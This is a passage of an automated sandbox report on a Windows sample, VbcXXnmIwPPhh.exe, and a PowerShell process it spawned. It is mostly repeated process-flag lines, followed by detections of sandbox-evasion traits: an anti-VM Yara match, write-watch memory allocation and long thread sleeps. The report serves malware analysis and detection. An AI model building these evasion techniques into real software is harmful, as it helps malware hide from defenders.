Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 3040000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 3270000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 31C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 7F50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 8F50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 9100000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: A100000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 1680000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 31B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 2FF0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599780 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599560 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597577 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597468 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597140 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597031 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596921 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596812 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596590 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596468 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595672 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595218 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595109 Jump to behavior
